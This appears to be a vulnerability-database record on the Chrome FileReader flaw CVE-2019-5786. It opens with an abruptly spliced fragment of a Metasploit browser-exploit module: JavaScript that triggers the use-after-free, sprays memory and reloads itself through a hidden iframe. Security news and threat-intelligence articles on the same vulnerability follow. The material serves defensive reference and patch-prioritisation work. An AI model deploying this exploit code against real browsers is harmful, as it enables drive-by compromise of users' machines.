The shellcode is executed within the Chrome sandbox, so you must explicitly disable the sandbox for the payload to be successful.", "edition": 1, "published": "2019-05-08T00:00:00", "title": "Chrome 72.0.3626.119 FileReader Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "1337DAY-ID-32669", "href": "https://0day.today/exploit/description/32669", "sourceData": "[duplicate of the Metasploit module source reproduced in the packetstorm entry above (chrome_filereader_uaf.rb); the 0day.today copy differs only in its trailing '# 0day.today [2019-05-08] #' line, so it is not repeated here]", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32669"}], "metasploit": [{"lastseen": "2020-10-15T08:15:21", "description": "This exploit takes advantage of a use after free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. The FileReader.readAsArrayBuffer function can return multiple references to the same ArrayBuffer object, which can be freed and overwritten with sprayed objects. The dangling ArrayBuffer reference can be used to access the sprayed objects, allowing arbitrary memory access from Javascript. This is used to write and execute shellcode in a WebAssembly object. The shellcode is executed within the Chrome sandbox, so you must explicitly disable the sandbox for the payload to be successful.\n", "published": "2019-05-06T09:05:00", "type": "metasploit", "title": "Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/CHROME_FILEREADER_UAF", "href": "", "sourceData": "[duplicate of the Metasploit module source reproduced in the packetstorm entry above; this copy differs only in 'DisclosureDate' => '2019-03-21' and is cut off on the page, so it is not repeated here]"
an exception with this message indicates that the FREE part of the exploit was successful\n if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {\n get_rw();\n rce();\n return;\n } else {\n console.log(e.message);\n }\n }\n }\n reader.onprogress = function(evt) {\n force_gc();\n let res = evt.target.result;\n // console.log(`onprogress ${onprogress_cnt}`);\n onprogress_cnt += 1;\n if (res.byteLength != f.size) {\n // console.log(`result has a different size than expected: ${res.byteLength}`);\n return;\n }\n lastlast = last;\n last = res;\n }\n if (spray === null) {\n // allocate the spray holders if needed\n allocate_spray_holders();\n }\n\n // clear the spray holder arrays\n clear_spray();\n\n // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit\n try {\n let failure = new ArrayBuffer(1024 * 1024 * 1024);\n } catch (e) {\n console.log(e.message);\n }\n\n force_gc();\n}\n\nfunction exploit() {\n init();\n reader.readAsArrayBuffer(f);\n console.log(`attempt ${try_cnt} started`);\n}\n </script>\n </head>\n <body onload=\"exploit()\">\n </body>\n</html>\n ^\n send_response(cli, html)\n elsif request.uri =~ %r{/worker.js$}\n send_response(cli, 'onmessage = function (msg) { }')\n else\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? 
'/'\n html = %Q^\n<html>\n <head>\n <script>\n function iter() {\n let iframe = null;\n try {\n iframe = document.getElementById('myframe');\n document.body.removeChild(iframe);\n } catch (e) {}\n\n iframe = document.createElement('iframe');\n iframe.src = '#{uripath}exploit.html';\n iframe.id = 'myframe';\n iframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\"\n document.body.appendChild(iframe);\n console.log(document.getElementById('myframe'));\n }\n\n function brute() {\n window.setTimeout(iter, 1000);\n let interval = window.setInterval(iter, 15000);\n\n window.onmessage = function(e) {\n if (e.data.includes('SUCCESS')) {\n console.log('exploit successful!');\n window.clearInterval(interval);\n }\n console.log(e);\n }\n }\n </script>\n </head>\n <body onload=\"brute()\"></body>\n</html>\n ^\n send_response(cli, html)\n end\n end\n\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/chrome_filereader_uaf.rb"}], "krebs": [{"lastseen": "2019-03-13T12:58:49", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "**Microsoft** on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its **Windows** operating systems, **Internet Explorer**, **Edge**, **Office** and **Sharepoint**. If you (ab)use Microsoft products, it's time once again to start thinking about getting your patches on. 
Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today's patch batch without any help from users.\n\nOne interesting patch from Microsoft this week comes in response to a [zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) vulnerability ([CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>)) reported by researchers at **Kaspersky Lab**, who discovered the bug could be (and is being) exploited to install malicious software.\n\nMicrosoft also addressed a zero day flaw ([CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)) in Windows 7 and Windows Server 2008 that's been abused in conjunction with a previously unknown weakness (CVE-2019-5786) in Google's Chrome browser. A [security alert](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html>) from Google last week said attackers were chaining the Windows and Chrome vulnerabilities to drop malicious code onto vulnerable systems.\n\nIf you use Chrome, take a moment to make sure you have this update and that there isn't an arrow to the right of your Chrome address bar signifying the availability of a new update. If there is, close out and restart the browser; it should restore whatever windows you have open on restart.\n\nThis is the third month in a row Microsoft has released patches to fix high-severity, critical flaws in the Windows component responsible for assigning Internet addresses to host computers (a.k.a. \u201cWindows DHCP client\u201d).\n\nThese are severe \"receive a bad packet of data and get owned\" type vulnerabilities. 
But **Allan Liska**, senior solutions architect at security firm Recorded Future, says DHCP vulnerabilities are often difficult to take advantage of, and the access needed to do so generally means there are easier ways to deploy malware.\n\nThe bulk of the remaining critical bugs fixed this month reside in Internet Explorer, Edge and Office. All told, not the craziest Patch Tuesday. Even Adobe's given us a month off (or at least a week) patching critical Flash Player bugs: The Flash player update shipped this week includes non-security updates.\n\nStaying up-to-date on Windows patches is good. Updating only after you've backed up your important data and files is even better. A good backup means you're not pulling your hair out if the odd buggy patch causes problems booting the system.\n\n**Windows 10** likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). 
For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in **Windows Update**.\n\nAs always, if you experience any problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a good chance other readers have experienced the same and may even chime in here with some helpful tips.\n\nFurther reading:\n\n[Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2019/03/12/march-2019-patch-tuesday-65-vulns-18-critical-rces-in-dhcp-client-adobe-vulns>)\n\n[SANS Internet Storm Center](<https://isc.sans.edu/forums/diary/Microsoft+March+2019+Patch+Tuesday/24742/>)\n\n[Ask Woody](<https://www.askwoody.com/2019/march-2019-patch-tuesday-patches/>)\n\n[ZDNet](<https://www.zdnet.com/article/microsoft-march-patch-tuesday-comes-with-fixes-for-two-windows-zero-days/>)", "modified": "2019-03-13T04:55:28", "published": "2019-03-13T04:55:28", "id": "KREBS:8CCFB0DC3A6FAC8000722BE0DCBA640E", "href": "https://krebsonsecurity.com/2019/03/patch-tuesday-march-2019-edition/", "type": "krebs", "title": "Patch Tuesday, March 2019 Edition", "cvss": {"score": 0.0, "vector": "NONE"}}], "fireeye": [{"lastseen": "2020-11-23T01:38:38", "bulletinFamily": "info", "cvelist": ["CVE-2019-0808", "CVE-2019-12650", "CVE-2019-19781", "CVE-2019-5786"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. 
In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nEvery information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest \u201cbranded\u201d vulnerability on the news, it\u2019s hard to know where to start.\n\nThe National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a [score](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator>) for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.\n\n \nFigure 1: How Mandiant Rates Vulnerabilities\n\n#### Assisting Patch Prioritization\n\nWe believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated \u2018high\u2019 and \u2018critical\u2019 compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting \u2018critical\u2019 and \u2018high\u2019 designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. 
For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a \u2018critical\u2019 rating (Figure 3).\n\n \nFigure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities\n\n \nFigure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities\n\n#### Mandiant Vulnerability Ratings Defined\n\nOur rating system includes both an exploitation rating and a risk rating:\n\nThe _Exploitation Rating_ is an indication of what is occurring in the wild.\n\n \nFigure 4: Mandiant Exploitation Rating definitions\n\nThe _Risk Rating_ is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.\n\n \nFigure 5: Mandiant Risk Rating definitions\n\nWe intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.\n\nFor example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation\u2014including by APT41\u2014the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.\n\nCVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that, when exploited, allows an attacker to remotely execute arbitrary code. 
Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.\n\nWe described widespread exploitation of CVE-2019-19781 in our [blog post](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>) earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we [observed](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.\n\n#### Factors Considered in Ratings\n\nOur vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. 
Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.\n\n_Impact considerations_ help determine what impact exploitation of the vulnerability can have on a targeted system.\n\n| **Impact Type** | **Impact Consideration** |\n|---|---|\n| Exploitation Consequence | The result of successful exploitation, such as privilege escalation or remote code execution |\n| Confidentiality Impact | The extent to which exploitation can compromise the confidentiality of data on the impacted system |\n| Integrity Impact | The extent to which exploitation allows attackers to alter information in impacted systems |\n| Availability Impact | The extent to which exploitation disrupts or restricts access to data or systems |\n\n_Mitigating factors_ affect an attacker\u2019s likelihood of successful exploitation.\n\n| **Mitigating Factor** | **Mitigating Consideration** |\n|---|---|\n| Exploitation Vector | What methods can be used to exploit the vulnerability? |\n| Attacking Ease | How difficult is the exploit to use in practice? |\n| Exploit Reliability | How consistently can the exploit execute and perform the intended malicious activity? |\n| Access Vector | What type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability? |\n| Access Complexity | How difficult is it to gain the access needed for the vulnerability? |\n| Authentication Requirements | Does the exploitation require authentication and, if so, what type of authentication? |\n| Vulnerable Product Ubiquity | How commonly is the vulnerable product used in enterprise environments? |\n| Product's Targeting Value | How attractive is the vulnerable software product or device to threat actors to target? |\n| Vulnerable Configurations | Does exploitation require specific configurations, either default or non-standard? |\n\n#### Mandiant Vulnerability Rating System Applied\n\nThe following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.\n\n| **Vulnerability** | **Vulnerability Description** | **NVD Rating** | **Mandiant Rating** | **Explanation** |\n|---|---|---|---|---|\n| CVE-2019-12650 | A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges | High | Low | This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges \u2013 level 15 admin privileges \u2013 to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this vulnerability. |\n| CVE-2019-5786 | A use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. | Medium | High | NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome. |\n\nAs demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result in a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the privileges required to exploit the vulnerability as well as the lack of observed exploitation. On the other hand, we rated CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.\n\nIn early 2019, Google [reported](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html>) two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability and pushed it to users through Chrome\u2019s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. 
The severity is further compounded by a public [blog post](<https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/>) and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.\n\n#### The Future of Vulnerability Analysis Requires Algorithms _and_ Human Intelligence\n\nWe expect the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.\n\nMandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.\n\nHuman curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. 
We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-20T12:00:00", "published": "2020-04-20T12:00:00", "id": "FIREEYE:173497473E4F8289490BBFFF8E828EC9", "href": "https://www.fireeye.com/blog/threat-research/2020/04/how-mandiant-intelligence-rates-vulnerabilities.html", "type": "fireeye", "title": "Separating the Signal from the Noise: How Mandiant Intelligence Rates\nVulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-09T11:22:56", "bulletinFamily": "info", "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0808", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-5786", "CVE-2020-0674"], "description": "Google has registered a significant drop in government-backed cyberattacks against its properties and the people who use its products.\n\nGoogle sends out warnings if it detects that an account is a target of government-backed phishing or malware attempts. For 2019, the internet giant sent almost 40,000 warnings \u2013 which, while a large number, is still a nearly 25 percent drop from the year before.\n\n**Nation-State Trends**\n\nIn terms of trends amongst the warnings, the analysis showed that main targets included, perhaps unsurprisingly, geopolitical rivals, government officials, journalists, dissidents and activists.\n\nIn 2019, about 20 percent of accounts that received a warning were targeted multiple times by attackers. 
Google also uncovered that phishing and zero-day exploits continue to be APT weapons of choice.\n\nOn the former front, Google researchers saw a growing trend emerge towards impersonating news outlets and journalists, especially when it comes to attackers from Iran and North Korea.\n\n\u201cFor example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation,\u201d explained Toni Gidwani, security engineering manager at the company\u2019s Threat Analysis Group (TAG), writing [in an overview](<https://blog.google/technology/safety-security/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/amp/>) of nation-state trends, published last week. \u201cIn other cases, attackers will send several benign emails to build a rapport with a journalist or foreign-policy expert before sending a malicious attachment in a follow up email.\u201d\n\nOn the zero-day front, TAG discovered bugs affecting Android, Chrome, iOS, Internet Explorer and Windows over the course of last year, including CVE-2020-0674. 
This is a [memory-corruption vulnerability disclosed in late January](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), a critical flaw for most Internet Explorer versions, allowing remote code-execution and complete takeover.\n\nOther notable bugs included [CVE-2018-8653](<https://threatpost.com/microsoft-ie-zero-day-gets-emergency-patch/140185/>), [CVE-2019-0676](<https://threatpost.com/microsoft-patches-zero-day-browser-bug-under-active-attack/141755/>), [CVE-2019-1367](<https://threatpost.com/microsoft-internet-explorer-zero-day-flaw-addressed-in-out-of-band-security-update/148584/>) and [CVE-2019-1429](<https://threatpost.com/microsoft-patches-rce-bug/150136/>) in Internet Explorer; [CVE-2019-5786](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Chrome; and [CVE-2019-0808](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Windows Kernel.\n\n**Zero-Day Details**\n\nThree bugs (CVE-2018-8653, CVE-2019-1367 and CVE-2020-0674) are vulnerabilities inside jscript.dll, Gidwani said. \u201cTherefore all exploits enabled IE8 rendering and used JScript.Compact as JS engine. 
In most Internet Explorer exploits, attackers abused the Enumerator object in order to gain remote code execution.\u201d\n\nMeanwhile, CVE-2019-0676 \u201cenables attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered,\u201d according to the writeup.\n\nAnd, \u201cthe attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.\u201d\n\nIn one campaign, a single APT was seen using five zero-day exploits, delivered using watering-hole attacks, links to malicious websites and in email attachments in targeted spear-phishing campaigns.\n\n\u201cFinding this many zero-day exploits from the same actor in a relatively short time frame is rare,\u201d said Gidwani. \u201cThe majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.\u201d\n\nNonetheless, he said that it\u2019s encouraging to see the decline in attacks.\n\n\u201cOne reason for this decline is that our new protections are working,\u201d said Gidwani. \u201cAttackers\u2019 efforts have been slowed down and they\u2019re more deliberate in their attempts, meaning attempts are happening less frequently as attackers adapt.\u201d\n", "modified": "2020-03-30T20:53:22", "published": "2020-03-30T20:53:22", "id": "THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "href": "https://threatpost.com/nation-state-attacks-google-analysis/154295/", "type": "threatpost", "title": "Nation-State Attacks Drop in Latest Google Analysis", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-15T11:44:46", "bulletinFamily": "info", "cvelist": ["CVE-2019-0592", "CVE-2019-0683", "CVE-2019-0697", "CVE-2019-0698", "CVE-2019-0726", "CVE-2019-0754", "CVE-2019-0757", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-0809", "CVE-2019-5786"], "description": "Microsoft released patches for two Win32k bugs actively under attack, along with fixes for four additional bugs that are publicly known, as part of its March Patch Tuesday security bulletin. The Win32k bugs are both elevation of privilege vulnerabilities, rated important, and tied to the way Windows handles objects in memory.\n\n\u201cAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d wrote Microsoft in its security bulletin for both Win32k bugs ([CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>), [CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)).\n\nOne of the bugs being actively exploited was reported by Kaspersky Lab, while the other was reported by the Google Threat Analysis Group. News broke last week that two vulnerabilities \u2013 CVE-2019-0808 and a separate Google Chrome [CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>) \u2013 were being actively exploited in the wild together. Now all three zero-days have been patched.\n\nThe four additional bugs, rated important, which are publicly known exploits ([CVE-2019-0683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0683>), [CVE-2019-0754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0754>), [CVE-2019-0757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0757>) and [CVE-2019-0809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0809>)), ranged from an Active Directory elevation of privilege vulnerability to a Windows denial of service vulnerability.\n\nThe most interesting of the above bugs is CVE-2019-0757 \u2013 a NuGet package manager tampering vulnerability. According to commentary by researchers at the Zero Day Initiative, the patch corrects a bug in the NuGet package manager that allows an attacker to modify a package\u2019s folder structure.\n\n\u201cIf successful, [an adversary] could modify files and folders that are unpackaged on a system,\u201d ZDI wrote. 
\u201cIf done silently, an attacker could potentially propagate their modified package to many unsuspecting users of the package manager. Fortunately, this requires authentication, which greatly reduces the chances of this occurring. This is one of the four publicly known bugs for this month, so if you\u2019re a NuGet user, definitely get this patch.\u201d\n\n## 17 Critical Bugs, Slayed\n\nIn all, Microsoft reported 64 unique bugs, 17 critical, 45 rated important, one moderate and one rated low in severity.\n\n\u201cThere are three Windows DHCP Client Remote Code Execution vulnerabilities with a 9.8 CVSS score in this month\u2019s release,\u201d wrote Satnam Narang, senior research engineer at Tenable, in a security brief. \u201cThis is the third straight month that Microsoft patched high severity bugs in either Windows DHCP Client or Windows DHCP Server, signaling increased attention on finding DHCP bugs.\u201d\n\nThose DHCP bugs ([CVE-2019-0697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0697>), [CVE-2019-0698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0698>), [CVE-2019-0726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0726>)) could allow attackers to execute their code in the DHCP client on affected systems.\n\n\u201cThese bugs are particularly impactful since they require no user interaction \u2013 an attacker sends a specially crafted response to a client \u2013 and every OS has a DHCP client,\u201d wrote [Dustin Childs in a blog post on the ZDI](<https://www.zerodayinitiative.com/blog/2019/3/12/the-march-2019-security-update-review>). 
\u201cThere would likely need to be a man-in-the-middle component to properly execute an attack, but a successful exploit would have wide-ranging consequences.\u201d\n\n## Battling Bad Scripting\n\nThis month\u2019s critical and important bug fixes were dominated by code execution flaws impacting Microsoft\u2019s Edge and Internet Explorer browsers. A Chakra scripting engine memory corruption vulnerability ([CVE-2019-0592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0592>)) patched by Microsoft is typical.\n\nThe flaw (CVE-2019-0592) is tied to the way the Chakra JavaScript scripting engine handles objects in memory in Microsoft Edge. \u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system,\u201d Microsoft wrote. The attack scenario includes a booby-trapped website where specially crafted content triggers the attack chain.\n\nOn Tuesday, Microsoft also included three advisories. Here they are verbatim:\n\n * [ADV190009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190009>) announces SHA-2 Code Sign support for Windows 7 SP1 and Windows Server 2008 R2. This update will be [required](<https://support.microsoft.com/en-us/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus>) for any new patches released after July 2019. Older versions of WSUS should also be updated to distribute the new SHA-2 signed patches.\n * [ADV190005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190005>) gives guidance on sharing the same user account across multiple users. 
Microsoft discourages this behavior and considers it a major security risk.\n * [ADV190005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190005>) provides mitigations for a potential denial-of-service in http.sys when receiving HTTP/2 requests. The patch allows users to set a limit on how many SETTINGS parameters can be sent in a single request.\n\n**_Don\u2019t miss our free live _****_[Threatpost webinar](<https://attendee.gotowebinar.com/register/6499105876772027139?source=ART>)_****_, \u201cExploring the Top 15 Most Common Vulnerabilities with HackerOne and GitHub,\u201d on Wed., Mar 20, at 2:00 p.m. ET._**\n\n**_Vulnerability experts Michiel Prins, co-founder of webinar sponsor HackerOne, and Greg Ose, GitHub\u2019s application security engineering manager, will join Threatpost editor Tom Spring to discuss what vulnerability types are most common in today\u2019s software, and what kind of impact they would have on organizations if exploited._**\n", "modified": "2019-03-12T21:52:31", "published": "2019-03-12T21:52:31", "id": "THREATPOST:0C6C1B17AFD30FEDE0604F98C6C93413", "href": "https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/", "type": "threatpost", "title": "Microsoft Patches Two Win32k Bugs Under Active Attack", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-16T23:58:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-0697", "CVE-2019-0626", "CVE-2019-0726", "CVE-2019-0698", "CVE-2018-8476", "CVE-2019-5786", "CVE-2019-0603"], "description": "On March 14, 2019 (GMT), Microsoft released its routine security update, fixing vulnerabilities in multiple products including Internet Explorer, Edge, Exchange Server, ChakraCore, Windows, Office, the NuGet package manager and the .NET Framework. Of the 64 CVEs, 17 were rated Critical, 45 were rated Important, one was rated Moderate and one was rated Low. Four of the vulnerabilities were publicly known, and two were exploited by attackers before patches were released. Details of some of the more important vulnerabilities follow. \nCVE-2019-0797: the fourth Windows kernel 0day that Kaspersky Lab recently found being exploited in the wild and reported; the exploit found targets 64-bit systems from Windows 8 through Windows 10 build 15063. Kaspersky Lab believes this vulnerability is used by several APT groups, including but not limited to FruityArmor and SandCat. Kaspersky's blog provides some technical details: The fourth horseman: CVE-2019-0797 vulnerability \nCVE-2019-0808: a Windows kernel 0day that Google found being used in the wild together with the Chrome 0day exploit for sandbox escape; 360CERT previously published a warning: CVE-2019-5786: chrome in the wild exploit 0day vulnerability warning. 360 Core Security Technology Center wrote code to construct a POC and partially reconstruct the process that triggers the vulnerability, so that security vendors can add appropriate protective measures: about CVE-2019-0808 kernel privilege escalation vulnerability cause analysis. The vulnerability is a NULL pointer dereference that is only exploitable on Windows 7; the exploit found targets 32-bit Windows 7. \nCVE-2019-0697, CVE-2019-0698, CVE-2019-0726: the three DHCP-related vulnerabilities fixed this month. Domestic and international security research teams published technical analyses of CVE-2019-0626, the DHCP vulnerability fixed last month: the Windows DHCP Server Remote Code Execution Vulnerability Analysis CVE-2019-0626; and Analyzing a Windows DHCP Server Bug (CVE-2019-0626). When an attacker sends a specially crafted packet to the DHCP server and exploits it successfully, arbitrary code can be executed in the DHCP service. Microsoft has released patches for Windows 10 1803/1809 and Windows Server 2019/1803. \nCVE-2019-0603: this vulnerability could allow an attacker to execute code with elevated privileges via a specially crafted TFTP message. On March 6, 2019, Check Point published a blog post disclosing CVE-2018-8476, a TFTP vulnerability fixed in November 2018: PXE Dust: Finding a Vulnerability in Windows Servers Deployment Services. This vulnerability is similar to CVE-2018-8476, but it lies in the TFTP service implementation, not in the TFTP protocol itself. Windows patches were released for multiple versions from Windows 7 through Windows 10. \nGiven that multiple vulnerabilities fixed this month have serious impact and some technical details have been disclosed, 360CERT recommends that users apply the fixes as soon as possible. 
